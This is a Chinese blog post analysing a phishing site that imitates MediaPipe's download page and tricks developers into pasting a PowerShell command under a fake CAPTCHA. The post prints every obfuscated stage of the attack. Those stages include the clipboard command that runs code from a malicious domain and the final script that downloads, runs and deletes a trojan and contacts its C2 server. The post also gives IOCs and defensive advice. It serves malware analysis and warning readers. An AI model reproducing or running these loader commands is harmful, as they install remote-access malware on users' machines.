仿冒MediaPipe官网钓鱼木马逆向分析

最近在搞MediaPipe姿态识别的项目,搜资料的时候碰上个挺有意思的钓鱼站,顺手完整逆向分析了一下,给做AI视觉开发的兄弟们避个坑。

遇到钓鱼站了

那天搜MediaPipe下载资源,点进一个网站,乍一看还挺像那么回事。点击下载按钮后,页面跳转到了一个所谓的人机验证界面。

upload successful

这个验证有点奇怪,没有常见的滑块验证码,而是提示让我复制剪贴板里的PowerShell命令到命令行执行来完成验证。剪贴板里自动填充的是这样的:

1
powershell -w h "iex(irm 'authorization-cdn-press-enter.info/fd2920fb5042fa69' -UseBasicParsing)"; exit <#Verification ID: fd2920fb5042fa69#>

稍微有点安全意识的看到这就知道不对劲了。正规的MediaPipe是Google家的开源项目,怎么可能让你执行PowerShell命令来验证?而且这个域名 authorization-cdn-press-enter.info 压根不是Google官方域名,连HTTPS都没有,纯HTTP。

明显是针对开发者的钓鱼投毒,于是干脆跟到底,看看这套攻击链长什么样。

第一层:异或20解密

访问那个恶意URL,拉回来的是一段混淆脚本。攻击者用字节数组加异或20的方式加密:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$kb173=7827;
$r743a=@(48,100,37,119,112,32,41,57,126,123,125,122,60,84,60,38,44,56,36,56,36,56,32,56,35,44,56,45,37,56);
$r743a+=@(45,37,56,38,37,56,37,56,36,56,38,44,56,38,35,56,34,56,38,45,56,37,32,56,38,37,56,36,56,38);
$k82af=[Math]::Abs(-6797);
$r743a+=@(45,56,38,35,56,38,34,56,44,45,56,38,39,56,37,34,56,38,34,56,44,45,56,32,56,34,56,37,35,56);
$r743a+=@(35,56,35,56,44,45,56,37,35,56,38,34,56,36,56,37,35,56,34,56,45,36,56,38,45,56,38,34,56,37);
$r743a+=@(44,56,38,35,56,45,37,56,37,44,56,37,34,56,35,36,56,35,35,56,35,36,56,34,44,56,37,44,56,38);
$r743a+=@(38,56,34,33,56,34,44,56,34,32,56,35,36,56,37,44,56,38,37,56,34,34,56,35,35,56,35,33,56,32);
$r743a+=@(39,56,35,39,56,34,45,61,104,49,111,79,119,124,117,102,73,60,48,75,57,118,108,123,102,37,37,34,61,105);
$r743a+=@(61,47,48,112,118,36,117,113,41,51,80,51,63,51,123,99,122,120,123,117,112,71,96,102,125,122,115,51,47,48);
$r743a+=@(101,119,112,117,114,41,90,113,99,57,91,118,126,113,119,96,52,60,51,90,51,63,51,113,96,58,67,113,118,87);
$r743a+=@(120,125,113,122,96,51,61,47,125,113,108,60,48,101,119,112,117,114,58,48,112,118,36,117,113,60,48,100,37,119);
$r743a+=@(112,32,61,61);
$kf5e7=$kb173+1;
if($kf5e7 -gt 1){$k0fee=$kf5e7-1}
$k2b01=$k0fee*0+$k82af;
iex(-join($r743a|%{[char]($_-bxor20)}))

逻辑很简单,把数组里每个数值异或20转成字符,拼接后用 iex 执行。这就是第一层,目的是加载第二层加密载荷。

第二层:异或116嵌套远控地址

解密第一层后得到第二段代码,这次用异或116:

1
2
3
4
$p1cd4=-join(@(28,0,0,4,78,91,91,21,1,0,28,27,6,29,14,21,0,29,27,26,89,23,16,26,89,4,6,17,7,7,89,17,26,0,17,6,90,29,26,18,27,91,18,16,70,77,70,68,18,22,65,68,64,70,18,21,66,77,75,43,73,69)|%{[char]($_-bxor116)});
$db0ae='D'+'ownloadString';
$qcdaf=New-Object ('N'+'et.WebClient');
iex($qcdaf.$db0ae($p1cd4))

解密后暴露了核心恶意地址:http://authorization-cdn-press-enter.info/fd2920fb5042fa69?_=1

有意思的是,直接浏览器访问这个链接会返回网页解析失败。攻击者做了访问鉴权,只允许脚本自动化拉取,不让人工直接看。这就更坐实了是个成熟的攻击框架。

第三层:巨型异或124数组

继续跟这个地址,返回的是个超大字节数组混淆脚本,全部数值异或124拼接后执行。里面内置了一个会话标识 session:4263 和一个超长的Base64加密字符串。

1
$vucy6=-join(@(118,88,22,77,24,79,79,24,65,79,73,78,76,71,118,88,22,74,76,68,76,76,65,39,49,29,8,20,33,70,70,61,30,15,84,81,73,72,76,68,85,71,118,88,10,24,69,77,8,14,65,91,29,21,62,68,25,18,31,13,31,78,23,55,53,40,23,27,53,21,57,10,55,27,19,10,29,43,42,12,51,21,69,12,24,43,19,27,26,36,4,74,48,36,50,12,59,40,11,18,29,43,42,12,51,21,15,44,53,21,53,49,50,6,19,14,44,43,16,77,46,62,76,74,48,6,11,74,37,4,76,21,55,5,15,87,30,17,49,24,55,5,76,20,53,63,19,69,39,69,30,18,69,73,24,41,46,13,51,79,15,13,48,36,38,87,31,78,49,23,53,47,31,27,38,27,73,17,26,79,8,21,26,79,24,21,26,79,24,21,26,52,77,21,24,79,77,21,25,36,4,21,25,36,4,21,25,59,54,83,24,17,54,83,24,78,54,83,25,78,54,78,37,18,4,83,37,18,69,74,37,18,4,79,37,18,20,21,26,79,24,21,26,79,12,21,24,17,54,79,37,18,16,74,37,18,12,21,26,43,54,79,37,18,16,74,37,18,4,69,37,18,4,83,37,18,4,21,26,52,73,21,26,52,73,21,25,36,12,21,26,59,54,79,37,18,69,79,37,18,4,21,26,52,69,21,25,36,77,21,26,79,12,21,24,78,54,83,37,18,38,21,25,36,4,21,24,18,73,21,25,17,54,74,37,18,38,83,37,18,4,21,24,18,16,21,24,79,12,21,24,18,77,21,24,18,8,21,24,18,20,21,24,18,8,21,25,59,54,78,26,17,54,68,37,18,20,21,24,18,4,21,24,18,4,21,24,18,69,21,24,18,73,21,24,79,8,21,25,78,54,78,26,78,54,78,25,43,54,78,26,43,54,78,25,43,54,78,26,59,54,83,37,18,38,75,37,18,38,69,37,18,77,21,24,18,16,21,24,18,8,21,24,18,73,21,25,59,54,78,25,17,54,79,25,78,54,74,37,18,77,21,24,79,12,21,24,79,8,21,24,18,20,21,25,78,54,75,37,18,77,21,25,78,54,78,25,17,54,83,37,18,38,74,37,18,38,75,37,18,38,83,37,18,69,21,26,78,54,79,25,78,54,79,25,78,54,78,26,17,54,69,37,18,20,21,25,78,54,72,37,18,20,21,24,18,77,21,24,79,12,21,24,79,12,21,25,17,31,5,29,6,41,42,48,47,37,10,44,62,50,17,29,20,58,22,48,56,37,20,44,52,69,87,26,43,31,6,38,79,42,13,51,21,12,6,58,45,31,62,37,62,72,10,51,21,37,40,24,52,45,50,53,47,49,15,54,5,61,14,38,20,41,52,61,43,61,25,48,6,19,17,57,79,46,76,63,47,15,74,59,21,15,22,44,20,72,10,51,21,38,17,38,78,53,42,62,11,58,27,52,21,68,74,54,20,50,76,24,61,23,14,51,20,11,10,53,63,19,20,53,11,27,18,53,21,15,61,48,5,49,14,38,17,24,18,46,62,41,52,61,43,61,55,54,6,11,14,48,40,19,20,44,56,31,40,24,52,45,50,44,63,15,10,51,21,15,55,54,6,11,14,48,40,19,20,44,56,24,17,29,22,19,13,38,6,53,62,51,6,12,22,61,56,15,21,53,23,46,13,51,21,20,6,58,45,31,62,37,62,72,10,51,21,37,40,24,52,45,50,53,47,49,15,54,5,61,14,38,17,19,74,55,17,53,42,62,11,58,27,52,21,68,74,54,20,50,76,24,61,23,14,51,20,11,10,53,63,19,20,53,11,27,18,53,21,15,61,48,5,49,14,38,17,24,16,29,43,61,14,50,21,8,12,38,76,46,13,51,47,77,6,61,63,15,73,37,11,57,15,54,63,15,8,51,17,73,17,29,45,61,14,51,17,61,38,55,5,11,50,53,17,16,16,29,47,31,14,53,56,12,12,38,76,46,13,53,47,42,6,26,23,45,19,53,40,4,17,29,21,24,6,26,18,42,13,54,78,73,22,53,22,12,9,26,43,73,22,48,5,61,13,30,17,69,13,53,47,42,77,29,21,24,16,38,43,31,77,46,59,73,9,51,22,11,79,50,41,46,9,30,17,73,9,58,45,31,62,37,61,27,18,53,21,15,40,24,52,46,13,53,52,77,68,25,21,77,17,29,22,19,19,37,17,19,73,48,43,62,13,53,52,4,74,24,5,12,17,29,22,8,75,55,21,77,78,26,17,24,18,46,59,73,9,30,17,72,18,55,59,37,42,62,11,58,27,63,63,31,21,55,4,50,76,24,61,15,78,54,6,76,74,44,43,38,13,51,21,20,18,38,6,42,13,53,47,42,6,26,6,49,14,53,22,76,14,50,46,76,74,48,6,11,74,37,4,76,21,55,5,15,87,30,18,11,6,46,59,73,9,49,5,76,10,51,21,76,17,50,46,76,74,48,6,11,74,37,4,76,21,55,5,15,87,30,18,11,6,46,56,50,57,54,5,20,17,30,4,41,52,61,43,61,53,54,5,53,14,57,79,46,76,63,6,37,18,44,40,19,69,38,17,19,74,55,59,24,18,50,47,15,78,54,6,19,6,46,62,76,74,48,6,11,74,37,4,72,68,53,47,76,14,44,40,77,9,37,11,27,18,53,21,15,25,48,6,19,17,30,17,19,74,55,57,45,74,44,56,31,77,52,40,19,10,44,56,12,22,52,47,53,14,55,6,73,9,25,79,41,42,62,11,58,27,63,63,31,21,55,4,50,76,24,61,19,14,53,21,15,74,55,78,38,13,51,21,20,18,49,5,76,10,51,21,76,17,50,40,50,57,29,22,8,79,26,18,77,87,24,79,50,22,54,63,57,18,53,59,37,51,38,18,16,72,37,18,38,87,37,18,38,87,37,18,38,74,37,18,77,87,37,18,69,83,37,18,69,83,37,18,20,79,37,18,38,83,37,18,38,87,37,18,16,72,37,18,16,75,37,18,38,72,37,18,16,73,37,18,24,74,37,18,20,79,37,18,38,87,37,18,16,73,37,18,16,75,37,18,16,74,37,18,24,21,25,36,69,21,25,52,12,21,25,36,12,21,24,78,54,78,25,17,54,78,25,59,54,72,25,78,54,78,25,43,54,78,25,43,54,79,37,18,20,75,37,18,16,74,37,18,38,87,37,18,20,75,37,18,38,72,37,18,69,87,37,18,16,73,37,18,16,74,37,18,20,72,37,18,16,75,37,18,69,83,37,18,38,74,37,18,69,83,37,18,69,79,37,18,16,83,37,18,16,83,37,18,69,78,37,18,20,75,37,18,4,87,37,18,4,79,37,18,69,72,37,18,4,68,37,18,4,83,37,18,4,68,37,18,20,79,37,18,69,79,37,18,20,75,37,18,20,79,37,18,69,73,37,18,69,73,37,18,69,78,37,18,69,79,37,18,4,78,37,18,16,87,37,18,69,78,37,18,4,87,37,18,69,72,37,18,4,87,37,18,69,73,37,18,20,72,37,18,4,68,37,18,69,72,37,18,20,74,37,18,4,87,37,18,4,68,37,18,69,79,37,18,20,79,37,18,4,69,37,18,4,78,37,18,16,83,37,18,20,74,37,18,4,79,37,18,4,78,37,18,4,83,37,18,16,87,37,18,16,87,37,18,20,74,37,18,16,87,37,18,4,69,37,18,20,72,37,18,4,69,37,18,4,68,37,18,69,78,37,18,20,72,37,18,20,72,37,18,4,78,37,18,4,78,37,18,69,79,37,18,20,74,37,18,20,79,37,18,16,87,37,18,20,79,37,18,20,79,37,18,69,72,37,18,4,79,37,18,4,79,37,18,16,83,38,6,54,14,50,46,41,8,54,21,68,68,57,78,38,13,57,43,49,15,50,21,57,68,26,36,20,18,49,78,24,77,29,21,61,13,48,5,20,68,31,78,23,55,53,40,23,27,53,21,57,10,55,20,76,74,44,59,16,16,29,47,31,27,55,43,16,57,51,22,11,79,50,46,41,72,53,47,31,13,57,78,19,73,48,43,62,13,53,63,19,10,55,52,4,17,29,22,8,79,26,18,77,87,24,78,31,6,48,47,68,74,48,47,37,77,49,11,65,65,91,71,118,88,22,76,74,73,30,26,65,88,22,77,24,79,79,24,87,88,22,74,76,68,76,76,71,118,64,95,92,15,25,15,15,21,19,18,70,72,78,74,79,92,95,66,118,88,6,68,30,72,31,73,65,91,91,82,59,25,8,40,5,12,25,84,85,82,61,15,15,25,17,30,16,5,71,118,88,6,68,68,75,24,24,65,88,6,68,30,72,31,73,82,59,25,8,40,5,12,25,84,81,22,19,21,18,84,60,84,77,77,72,80,68,68,80,68,78,80,68,73,80,74,68,80,75,74,80,77,73,80,69,68,80,75,68,80,75,69,80,68,75,80,74,68,80,68,79,80,68,73,85,0,89,7,39,31,20,29,14,33,84,88,35,81,30,4,19,14,79,79,85,1,85,85,71,118,88,22,24,68,76,31,79,65,60,84,68,73,74,75,80,68,77,68,74,80,72,79,68,73,85,71,118,88,6,75,25,73,69,79,65,88,6,68,68,75,24,24,82,59,25,8,49,25,8,20,19,24,84,81,22,19,21,18,84,60,84,77,76,79,80,68,79,80,75,68,80,75,74,80,69,69,80,74,72,80,68,78,80,74,68,80,78,79,80,78,77,80,77,77,72,80,68,73,80,68,79,80,75,78,80,75,69,80,75,76,85,0,89,7,39,31,20,29,14,33,84,88,35,81,30,4,19,14,79,79,85,1,85,80,39,8,5,12,25,39,33,33,60,84,39,15,8,14,21,18,27,33,85,85,71,118,21,26,84,88,22,76,74,73,30,26,92,81,27,8,92,76,85,7,88,22,26,30,69,24,76,65,88,22,76,74,73,30,26,81,77,1,118,88,11,75,76,76,75,75,65,81,22,19,21,18,84,88,6,75,25,73,69,79,82,53,18,10,19,23,25,84,88,18,9,16,16,80,39,29,14,14,29,5,33,88,10,24,69,77,8,14,85,0,89,7,39,31,20,29,14,33,84,88,35,92,81,30,4,19,14,92,75,68,85,1,85,71,118,88,22,72,72,68,25,68,65,88,22,24,68,76,31,79,39,76,33,87,88,22,74,76,68,76,76,71,118,64,95,92,14,25,15,19,9,14,31,25,70,79,73,78,76,92,95,66,118,21,26,84,88,22,76,74,73,30,26,92,81,27,8,92,76,85,7,88,22,75,79,69,69,75,65,88,22,72,72,68,25,68,81,77,1,118,21,25,4,84,88,11,75,76,76,75,75,85)|%{[char]($_-bxor124)});iex($vucy6) <#Verification ID: fd2920fb5042fa69#>

解密后的代码开始用.NET反射绕过检测,并暴露了两个新的C2地址:

1
2
http://authorization-cdn-press-enter.info/7cc6e094212a7ea55678b60405f24d027a38cd981bbdb3f326ff887dabaa499c
http://authorization-cdn-press-enter.info/p/7cc6e094212a7ea55678b60405f24d027a38cd981bbdb3f326ff887dabaa499c

第二个路径访问只返回一个 no,第一个也是解析失败,跟之前一样做了防护。

最终落地:完整木马逻辑

一路解密到最后,终于看到了无混淆的完整恶意代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$n249d='DownloadDa'+'ta';$n324c='Wri'+'teAllBytes';
Start-Sleep -Seconds 17;
$u5dc80=-join(@(15,19,19,23,93,72,72,6,18,19,15,8,21,14,29,6,19,14,8,9,74,4,3,9,74,23,21,2,20,20,74,2,9,19,2,21,73,14,9,1,8,72,80,4,4,81,2,87,94,83,85,86,85,6,80,2,6,82,82,81,80,95,5,81,87,83,87,82,1,85,83,3,87,85,80,6,84,95,4,3,94,95,86,5,5,3,5,84,1,84,85,81,1,1,95,95,80,3,6,5,6,6,83,94,94,4)|%{[char]($_-bxor103)});
$td=[IO.Path]::Combine([IO.Path]::GetTempPath(),[IO.Path]::GetRandomFileName())
[IO.Directory]::CreateDirectory($td)|Out-Null
$tf=[IO.Path]::Combine($td,[IO.Path]::GetRandomFileName()+'.exe')
$wc=New-Object ('Net.WebCl'+'ient')
$ok=0
# 3次重试下载EXE
for($i=0;$i -lt 3 -and !$ok;$i++){
try{
[IO.File]::$n324c($tf,$wc.$n249d($u5dc80))
if([IO.File]::Exists($tf)){$ok=1}else{Start-Sleep 2}
}catch{Start-Sleep 2}
}
# 下载成功启动木马
if(![IO.File]::Exists($tf)){exit}
Start-Process -FilePath $tf
# 启动后延迟5秒删除文件
try{Start-Sleep 5;[IO.File]::Delete($tf)}catch{}
# 额外访问C2地址上报信息
$u90309=-join(@(76,80,80,84,30,11,11,69,81,80,76,75,86,77,94,69,80,77,75,74,9,71,64,74,9,84,86,65,87,87,9,65,74,80,65,86,10,77,74,66,75,11,84,11,19,71,71,18,65,20,29,16,22,21,22,69,19,65,69,17,17,18,19,28,70,18,20,16,20,17,66,22,16,64,20,22,19,69,23,28,71,64,29,28,21,70,70,64,70,23,66,23,22,18,66,66,28,28,19,64,69,70,69,69,16,29,29,71)|%{[char]($_-bxor36)});
$ndaf2='DownloadStr'+'ing'
try{[void]$wc.$ndaf2($u90309)}catch{}

这套流程设计得挺完整的:

  1. 先睡17秒 —— 规避沙箱的快速行为检测,很多沙箱只会监控前几秒的行为
  2. 随机文件名存临时目录 —— 没有固定特征,难以通过文件名拦截
  3. 三次重试下载 —— 保证木马能成功落地,网络波动也不怕
  4. 启动后自删除 —— 运行完5秒就删掉本地exe,取证痕迹很少
  5. 额外上报C2 —— 把设备信息回传给攻击者

全程用的都是PowerShell和.NET原生API,属于典型的 Living off the Land 攻击,传统杀毒软件的静态特征很难拦住。

攻击链路梳理

把整个攻击过程梳理一下:

  1. 诱饵 —— 仿冒MediaPipe官网,专门钓鱼做AI视觉开发的
  2. 诱导 —— 假的人机验证,剪贴板自动填充恶意命令
  3. 加载器 —— powershell -w hidden 静默窗口,远程拉取脚本
  4. 多层解密 —— 四层异或混淆(xor20/116/124/103)加Base64嵌套
  5. 载荷下载 —— 拉取EXE木马存到临时目录
  6. 执行销毁 —— 运行后删除本地文件,回传数据到C2

这套攻击链挺成熟的,针对性强,混淆手段也多样。

高风险点在哪

这个攻击有几个地方挺危险的:

  • 精准定向开发者 —— MediaPipe是做姿态识别的高频工具,开发者急着下资源,警惕性自然就低了
  • 多层混淆 —— 四层异或加密,原始脚本里看不到任何恶意关键词,静态查杀基本失效
  • 无文件攻击 —— 脚本在内存里解密执行,木马运行完还自己删了,日志痕迹极少
  • 伪装验证 —— 让人以为是正常的下载验证流程,很容易就复制命令执行了
  • 纯原生API —— 全程PowerShell和.NET原生接口,绕过基础防护不难

怎么防

资源下载要认准官方

MediaPipe这种Google家的东西,就老老实实去GitHub官方仓库、pip、maven这些正规渠道下。第三方的不知名下载站,凡是让你执行PowerShell或CMD命令的,直接关掉就完事。

PowerShell执行管控

把执行策略改成只允许签名脚本:

1
Set-ExecutionPolicy AllSigned -Force

开启完整的AMSI防护,监控带 iexirmDownloadDataNet.WebClient 这些参数的PowerShell进程。

浏览器防护

  • 访问工具站点先看域名是不是官方的,纯HTTP的就更得留个心眼
  • 防火墙把恶意域名 authorization-cdn-press-enter.info 拦了
  • 开启浏览器的恶意网站拦截功能,不让页面自动写剪贴板

日常习惯

陌生PowerShell命令别直接复制运行,先粘到记事本里看看有没有 irmiexDownloadString 这种可疑关键字。如果要测试未知脚本,在虚拟机里跑,别在办公电脑上直接执行。

最后

现在的钓鱼木马越来越精细化,攻击者专门盯着开发者的刚需工具做文章。这次遇到的MediaPipe钓鱼站,四层异或嵌套混淆、临时目录落地、执行自销毁,整套攻击链挺成熟的。

各位做开发的同学下开源工具、SDK、模型资源的时候,一定认准官方渠道。遇到让你执行命令行验证的页面,直接关掉,别抱侥幸心理。把终端脚本执行管控好,恶意域名也拦截掉,避免远控木马进来了造成代码、账号、设备数据泄露。


IOC汇总

恶意域名:authorization-cdn-press-enter.info

一级载荷地址:/fd2920fb5042fa69

木马下载地址:/7cc6e094212a7ea55678b60405f24d027a38cd981bbdb3f326ff887dabaa499c

上报C2地址:/p/7cc6e094212a7ea55678b60405f24d027a38cd981bbdb3f326ff887dabaa499c